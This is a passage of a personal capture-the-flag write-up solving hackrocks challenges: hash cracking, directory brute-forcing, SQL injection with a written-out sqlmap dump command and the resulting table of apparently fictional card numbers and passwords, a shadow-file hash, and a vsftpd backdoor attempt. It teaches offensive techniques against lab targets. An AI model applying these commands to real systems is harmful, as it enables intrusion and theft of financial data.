Between 0.00042 ETH and an additional 0.0012 ETH if the password is cracked.

To play the game you need a set of tools integrated into the game which are obtained by purchasing boxes. The 4 available boxes are:

demo (Free): contains a tool with 20% hash detection and 15% cracking probability.
Basic: contains a tool with 50% password hash detection probability and 25% cracking probability.
The intermediate: contains a tool with a hash detection probability of 80% and a cracking probability of 50%.
The pro: contains two separate tools, one with 100% hash detection and the other with 95% cracking probability. In other words, the pro provides two specialized tools that almost ensure profit.

If you buy, for example, the basic box and then the pro, the game detects you as if you had only the pro box, that is, bonuses are not accumulated, but it keeps the ones from the last purchased box.

Juan does not know very well if it is profitable to invest or not in the game, but before jumping to buy any box, he decides to try the demo that is free. After two plays he detects a bug in the game, and that is that the game calculates and displays the type of hash and the encrypted password before the user clicks on the Decrypt button.

John doesn’t understand much about cryptography, but he knows that there are tools (outside the game) to detect hashes and break passwords, so he asks you to help him crack one of the hardest passwords the game has thrown at him so far.

The information Juan saw on his screen was:

sha384

73a32b396debcb88809e534a6257ff32a67e70a0663740f538969c7741dfece93309f0dce80d57924602423cf8d3e0b9

Will you be able to make Juan earn some money? Help him crack the password in Clear, as well as the profit (in ETH) if he gets the maximum prize (express to 5 decimal places).

The token must be in the following format: counter-crypt-prize

Example answer: premio-3'21248

SOLUTION: Since everything was already given here including hash & algorithm, all that was left to do was crack it. I used “https://crackstation.net" which gave me “premio”. Now for 2nd part of the code, I simply added the highest benefits i.e, “0.00021+0.0012” & entered in the format “premio-0'00141”. However I didn’t think it would work but surprisingly it did.

3. LeChuck is back:-

Description: Where could they have started? Your instinct warns you: LeChuck has a big ego, and he’s probably left his signature somewhere on your site.

Is it that easy? Bingo! Something pops up at that URL https://challenges.hackrocks.com/lechuck
Look for LeChuck’s footprints to move on!

SOLUTION: Since this was a website, I used /usr/share/wordlists/dirb/common.txt to find any open endpoints. For some reason first two attempts failed with Dirb, however, while using Gobuster I discovered an open one “https://challenges.hackrocks.com/lechuck/user" which said, “To get info about a user, use the syntax: /user/<username>”.

After this, it was simply including “lechuck” as the username and getting the flag “lechuck,{flag}MBZICNIBRM”.

4. Simon a Successful Streamer:

Description: That’s right, Simon Runbott has lost access to his bitcoins. He was storing them on an old Linux computer, which he has completely forgotten the password to access. At least he managed to send us a password file, which he hopes will help.

Can you recover Simon’s password?
Paswword hash: “simon:$6$ephwDW/dO/YUIRFq$4MtdliecaYjJ4dKIqbBbX3SsT8mebY3tdb6UdR0qMZkQG.so.GrCUC0sgt7SjGQlhY/xiLLnzkaIB4gYb5lY./:18760:0:99999:7:::”

SOLUTION: I did find an account on Instagram “simon.runbott” and managed to extract some keywords “Audi, RTBB221, Cat, Django, 2018, however by the time I went back to try them CTF has been ended. So this challenge was not completed.

5. Attacking The Bad Guy:-

Description: Not all cybercriminals secure their communications or methods, so they can be tracked and sometimes even compromise their services.

In this case, “the bad guy” left a trace on his website, and you will have to break it to verify if your customer’s data is stored on it. Do you dare to hack the “hacker”?
[Challenges Second]
lenaff8

In the last couple of days, tickets have been received from our customers notifying and claiming money for purchases that they have not made, but both on our website and on other sites, that is, users are receiving unrequited money charges.

All of them agree that these charges are made after having made a purchase in our store. Following this rare occurrence, we called in our Blue Team to investigate the case. After reviewing both the logs and the web code, they managed to find a third-party library that captured the information of the bank cards as well as their CVV and expiration date. Additionally, analyzing said library they find the website to which the data was being sent, but they find a login and this team is not specialized in attacks of this style, so they request your help, so that you investigate said website, obtain access and check if the stored data is there, and more specifically, the data of Adrián Peréz Ríos, since he is an important buyer.

The challenge token will be: Adrián Pérez Ríos’s passwordadmin-numcard-cvv-expiredate or 0000000000–123–12/22 if it is not present.

Response example: admin12–4548812049400004–203–08/27
To access the challenge, click on the following link: https://challenges.hackrocks.com/bad-guy

SOLUTION: Since this one included a login portal, it was time to bring out Big guns. I used Burp Suite to intercept a login request “https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f" and passed it to Sqlmap with the syntax “sqlmap -u https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f — dump”.
This dumped two tables:
Database: filtrados
Table: cuentas
[10 entries]
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +
| id | cvv | name | fecha_cad | last_name | num_cuenta |
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +
| 1 | 100 | Mariola | 05/26 | Benítez Madroñal | 2683393655746243 |
| 2 | 321 | Claus | 03/24 | Grande Sanchez | 4866928395393289 |
| 3 | 345 | Imanol | 08/23 | Zabala | 4834966576322339 |
| 4 | 456 | María | 09/22 | Castañeda León | 6232573332859554 |
| 5 | 879 | Adrián | 07/25 | Pérez Ríos | 6269784865499645 |
| 6 | 20 | Francisco Javier | 02/26 | Sánchez Puente | 6478497458632956 |
| 7 | 107 | Mariola | 02/23 | Benítez de la Herranz | 4593769667235535 |
| 8 | 589 | Pepe | 06/24 | Rodríguez Escobar | 4982832873926876 |
| 9 | 986 | Jonathan | 04/23 | Garcia Soria | 7626334895889925 |
| 10 | 345 | Miguel Ángel | 05/23 | de los Santos Torres | 5633443968477687 |
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +

Database: filtrados
Table: usuarios
[2 entries]
+ — — — + — — — -+ — — — — — — — — — — +
| id_u | usu | contra |
+ — — — + — — — -+ — — — — — — — — — — +
| 1 | admin | 123456789987654321 |
| 2 | usu | 1234678 |
+ — — — + — — — -+ — — — — — — — — — — +

Now as per the given format, we had to enter like “Response example: admin12–4548812049400004–203–08/27” so I used “123456789987654321–6269784865499645–879–07/25” and voila, Bad guy pwned. One thing I would mention is in the case of pentest or production environment, I would never have used sqlmap such recklessly as it might have done serious disruption.

6. The Final Countdown:-

Description: Did you know that we at hackrocks have launched our own space program? In fact, we have decided to compete with Elon Musk and our ultimate goal is to reach Mars! Why not? :).

But for now, first stop, the moon. And we have already started with setbacks. Possibly due to the action of cosmic radiation, the countdown to the emergency launch of the module back to Earth has started. Unless our pilots can stop it in time, it will inevitably take off, whether they are on board or not.

As part of the ground crew, can you help them?

For security, this code is changed every few seconds. The commander has a hardware device, similar to an RSA key, which generates an OTP from the current code. However, the commander has lost it, and we don’t have time to send him another one!

File:RSA-SecurID-Token.jpg — Wikimedia Commons

Will you be able to stop the countdown by providing the next valid code after the current one at some point in time?
To access the challenge, click on the following link: https://challenges.hackrocks.com/launch-code/

SOLUTION: I looked at the website once and took rain check.

7. FTPing:-

Description: You should already know that, in the hacker universe, nothing is what it seems, nor is it where it should be. In this challenge you will have to face a lonely machine, which will not easily reveal its secrets to you. Ready to accept the challenge?

Of course, getting the token will not be easy at all. You will have to use different techniques, and chain several of them together. So enough chitchat for now.

Your target? The next machine:
assembly.hackrocks.com
Good luck!

SOLUTION: This challenge remained unsolved, however, this was a very interesting one as I managed to uncover some juicy details. Nonetheless, it was a deadend.
Details are as follows:
Domain = assembly.hackrocks.com
IP = 23.88.100.109
Hostname = static.109.100.88.23.clients.your-server.de
Operating System = Ubuntu 20.04
Open Ports = 22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3) & 2121 (vsFTPd 2.3.4)
Now I said interesting before as this particular version of vsftpd has a particular “Backdoor Command Execution” vulnerability which seemed to be patched here. I tried multiple exploits including one available in Metasploit as well to no avail.

8. Santa Claus has Disappeared:-

Description: Santa Claus has been kidnapped! Christmas is in danger!

Of course, you cannot remain impassive, ¡help us! The problem is that we only have a network traffic capture that, we are sure, has been generated by Santa.

In this challenge:
You must find the geographic location of Santa.
You will learn to analyze traffic captures.
You must exercise your analytical and abstraction skills.

It’s terrible, Santa Claus has disappeared. Our agents suspect that The Grinch is behind this kidnapping. But, as always, it won’t be easy for us to find him. The only thing we have achieved is a traffic capture, obtained from a wireless interface, which we know has been generated by Santa himself to request help.

By the way, our little helpers inform us that the token to overcome this challenge will be Santa’s geographic location.

Ready to start?

SOLUTION: This challenge was not solved, however here is my analysis.
The PCAP file had some very interesting data and I managed to extract Santa’s private IP (192.168.1.84). This IP led me to some MAC addresses (80:78:71:8e:91:d0, c8:09:a8:75:14:b7) and IPs (95.216.99.248, 20.190.129.100, 52.113.205.16, 157.245.220.120). I also saw some searches made over port 80 ( help, how to make gorg, how to open locked doors, what is Stockholm syndrome). I tried to enter Stockholm as that is a city but it wasn’t the right answer.

I believe with more time on my hand at least 2 other challenges could have been solved. Nonetheless, this CTF served as a nice break and am looking forward to participating next year as well.